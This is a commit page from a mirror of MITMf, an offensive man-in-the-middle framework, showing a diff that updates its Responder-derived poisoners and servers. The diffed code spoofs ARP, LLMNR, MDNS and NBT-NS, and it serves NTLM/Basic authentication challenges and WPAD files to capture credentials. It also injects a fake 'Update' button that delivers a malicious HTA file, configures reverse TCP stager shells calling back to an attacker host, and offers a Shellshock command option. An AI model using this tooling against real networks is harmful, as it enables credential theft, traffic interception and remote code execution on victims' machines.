github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-06 13:02:24 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

responder code is now up to date with the lastest version

Browse source 
logging is going to have to get cleaned up, but that's a minor issue
re-implemented the function to add endpoints to the http server
added an option to manually specify the gateways mac in the Spoofer plugin
This commit is contained in:
byt3bl33d3r 2015-08-05 13:31:04 +02:00
parent c527dc1d21
commit 772ef9ab39
12 changed files with 375 additions and 332 deletions
Download patch file Download diff file Expand all files Collapse all files

8
config/mitmf.conf
View file

@ -446,8 +446,8 @@
[[[[WindowsIntelx86]]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = automatic
HOST = 192.168.1.88
PATCH_METHOD =
HOST = 10.9.135.193
PORT = 8444
SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None
@ -458,8 +458,8 @@
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = automatic
HOST = 192.168.1.16
PATCH_METHOD =
HOST = 10.9.135.193
PORT = 8088
SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None

2
core/html/htadriveby.html
View file

@ -54,7 +54,7 @@ newHTML.innerHTML = ' \
<ul> \
\
<li> \
<a target="_blank" href="http://_IP_GOES_HERE_/Flash.hta"> \
<a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_"> \
<button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;"> \
Update \
</button> \

4
core/poisoners/ARP.py
View file

@ -38,8 +38,10 @@ class ARPpoisoner:
except AddrFormatError as e:
sys.exit("Specified an invalid IP address as gateway")
self.gatewaymac = options.gatewaymac
if options.gatewaymac is None:
self.gatewaymac = getmacbyip(options.gateway)
if self.gatewaymac is None: sys.exit("Error: Could not resolve gateway's MAC address")
if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")
self.ignore = self.get_range(options.ignore)
if self.ignore is None: self.ignore = []

5
core/poisoners/LLMNR.py
View file

@ -80,7 +80,6 @@ def IsICMPRedirectPlausible(IP):
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.")
else:
pass
@ -107,14 +106,14 @@ class LLMNRServer(BaseRequestHandler):
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("[Analyze mode: LLMNR]{} Request by {} for {}, ignoring".format(self.client_address[0], Name))
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("[LLMNR] Poisoned answer sent to {} for name {}".format(self.client_address[0], Name))
settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))

4
core/poisoners/MDNS.py
View file

@ -87,7 +87,7 @@ class MDNSServer(BaseRequestHandler):
# Analyze Mode
if settings.Config.AnalyzeMode:
if Parse_IPV6_Addr(data):
settings.Config.AnalyzeLogger.warning('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (self.client_address[0], Request_Name))
settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))
# Poisoning Mode
else:
@ -98,7 +98,7 @@ class MDNSServer(BaseRequestHandler):
Buffer.calculate()
soc.sendto(str(Buffer), (MADDR, MPORT))
settings.Config.PoisonersLogger.warning('[MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name))
settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))
except Exception:
raise

8
core/poisoners/NBTNS.py
View file

@ -86,7 +86,7 @@ class NBTNSServer(BaseRequestHandler):
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("[Analyze mode: NBT-NS] Request by %s for %s, ignoring" % (self.client_address[0], Name))
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
@ -94,8 +94,8 @@ class NBTNSServer(BaseRequestHandler):
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("[NBT-NS] Poisoned answer sent to %s for name %s (service: %s)" % (self.client_address[0], Name, NBT_NS_Role(data[43:46])))
settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version : %s" % Finger[0])
settings.Config.ResponderLogger.info("[FINGER] Client Version : %s" % Finger[1])
settings.Config.ResponderLogger.info("[FINGER] OS Version : {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))

53
core/servers/HTTP.py
View file

@ -34,6 +34,20 @@ log = logger().setup_logger("HTTP", formatter)
class HTTP:
static_endpoints = {}
endpoints = {}
@staticmethod
def add_endpoint(url, content_type, payload):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
Buffer.calculate()
HTTP.endpoints['/' + url] = Buffer
@staticmethod
def add_static_endpoint(url, content_type, path):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
def start(self):
try:
if OsInterfaceIsSupported():
@ -41,7 +55,7 @@ class HTTP:
else:
server = ThreadingTCPServer(('', 80), HTTP1)
t = threading.Thread(name='SMB', target=server.serve_forever)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
@ -156,7 +170,7 @@ def RespondWithFile(client, filename, dlname=None):
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
Buffer.calculate()
log.info("[HTTP] Sending file {} to {}".format(filename, client))
log.info("{} [HTTP] Sending file {}".format(filename, client))
return str(Buffer)
@ -166,12 +180,16 @@ def GrabURL(data, host):
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET:
log.info("[HTTP] GET request from: {} URL: {}".format(host, ''.join(GET)))
req = ''.join(GET).strip()
log.info("[HTTP] {} - - GET '{}'".format(host, req))
return req
if POST:
log.info("[HTTP] POST request from: {} URL: {}".format(host, ''.join(POST)))
req = ''.join(POST).strip()
log.info("[HTTP] {} - - POST '{}'".format(host, req))
if len(''.join(POSTDATA)) > 2:
log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
return req
# Handle HTTP packet sequence.
def PacketSequence(data, client):
@ -209,7 +227,7 @@ def PacketSequence(data, client):
ParseHTTPHash(NTLM_Auth, client)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
log.info("[HTTP] WPAD (auth) file sent to %s" % client)
log.info("{} [HTTP] WPAD (auth) file sent".format(client))
return WPAD_Custom
else:
@ -234,7 +252,7 @@ def PacketSequence(data, client):
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
if settings.Config.Verbose:
log.info("[HTTP] WPAD (auth) file sent to %s" % client)
log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
return WPAD_Custom
else:
@ -246,12 +264,12 @@ def PacketSequence(data, client):
if settings.Config.Basic == True:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
log.info("[HTTP] Sending BASIC authentication request to %s" % client)
log.info("{} [HTTP] Sending BASIC authentication request".format(client))
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
log.info("[HTTP] Sending NTLM authentication request to %s" % client)
log.info("{} [HTTP] Sending NTLM authentication request to".format(client))
return str(Response)
@ -263,13 +281,26 @@ class HTTP1(BaseRequestHandler):
while True:
self.request.settimeout(1)
data = self.request.recv(8092)
GrabURL(data, self.client_address[0])
req_url = GrabURL(data, self.client_address[0])
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(Buffer)
if settings.Config.Verbose:
log.info("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
resp = HTTP.endpoints[req_url.strip()]
self.request.send(str(resp))
if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
path = HTTP.static_endpoints[req_url.strip()]['path']
Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
with open(path, 'r') as file:
Buffer.fields['Payload'] = file.read()
Buffer.calculate()
self.request.send(str(Buffer))
else:
Buffer = PacketSequence(data,self.client_address[0])
@ -294,7 +325,7 @@ class HTTPS(StreamRequestHandler):
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.exchange.send(Buffer)
if settings.Config.Verbose:
log.info("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))
else:
Buffer = PacketSequence(data,self.client_address[0])

13
core/servers/SMB.py
View file

@ -77,7 +77,6 @@ def Parse_Nego_Dialect(data):
packet = data
try:
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
#print hex(Dialect)
if Dialect[0] == "NT LM 0.12":
return "\x00\x00"
@ -101,6 +100,16 @@ def Parse_Nego_Dialect(data):
return "\x09\x00"
if Dialect[10] == "NT LM 0.12":
return "\x0a\x00"
if Dialect[11] == "NT LM 0.12":
return "\x0b\x00"
if Dialect[12] == "NT LM 0.12":
return "\x0c\x00"
if Dialect[13] == "NT LM 0.12":
return "\x0d\x00"
if Dialect[14] == "NT LM 0.12":
return "\x0e\x00"
if Dialect[15] == "NT LM 0.12":
return "\x0f\x00"
except Exception:
print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
print hexdump(packet)
@ -260,8 +269,8 @@ class SMB1(BaseRequestHandler):
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass

2
mitmf.py
View file

@ -82,7 +82,7 @@ from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
log.debug("MITMf started:{}".format(sys.argv))
log.debug("MITMf started: {}".format(sys.argv))
from core.sslstrip.CookieCleaner import CookieCleaner
from core.proxyplugins import ProxyPlugins

12
plugins/htadriveby.py
View file

@ -30,24 +30,18 @@ class HTADriveBy(Inject, Plugin):
def initialize(self, options):
self.bar_text = options.text
self.ip = options.ip
self.hta = options.hta_app.split('/')[-1]
Inject.initialize(self, options)
self.html_payload = self.get_payload()
from core.servers.HTTP import HTTP
def hta_request(path):
if path == options.hta_app.split('/')[-1]:
with open(options.hta_app) as hta_file:
resp = flask.Response(hta_file.read())
resp.headers['Content-Type'] = "application/hta"
return resp
HTTPserver().add_endpoint(hta_request)
HTTP.add_static_endpoint(self.hta, "application/hta", options.hta_app)
def get_payload(self):
with open("./core/html/htadriveby.html", 'r') as file:
payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
payload = re.sub("_PAYLOAD_GOES_HERE_", self.hta, payload)
return payload
def options(self, options):

7
plugins/responder.py
View file

@ -44,30 +44,37 @@ class Responder(Plugin):
if self.config["Responder"]["SQL"].lower() == "on":
from core.servers.MSSQL import MSSQL
self.tree_info.append("MSSQL server [ON]")
MSSQL().start()
if self.config["Responder"]["Kerberos"].lower() == "on":
from core.servers.Kerberos import Kerberos
self.tree_info.append("Kerberos server [ON]")
Kerberos().start()
if self.config["Responder"]["FTP"].lower() == "on":
from core.servers.FTP import FTP
self.tree_info.append("FTP server [ON]")
FTP().start()
if self.config["Responder"]["POP"].lower() == "on":
from core.servers.POP3 import POP3
self.tree_info.append("POP3 server [ON]")
POP3().start()
if self.config["Responder"]["SMTP"].lower() == "on":
from core.servers.SMTP import SMTP
self.tree_info.append("SMTP server [ON]")
SMTP().start()
if self.config["Responder"]["IMAP"].lower() == "on":
from core.servers.IMAP import IMAP
self.tree_info.append("IMAP server [ON]")
IMAP().start()
if self.config["Responder"]["LDAP"].lower() == "on":
from core.servers.LDAP import LDAP
self.tree_info.append("LDAP server [ON]")
LDAP().start()
def reactor(self, strippingFactory):

1
plugins/spoof.py
View file

@ -93,6 +93,7 @@ class Spoof(Plugin):
options.add_argument('--netmask', dest='netmask', type=str, default='255.255.255.0', help='The netmask of the network')
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')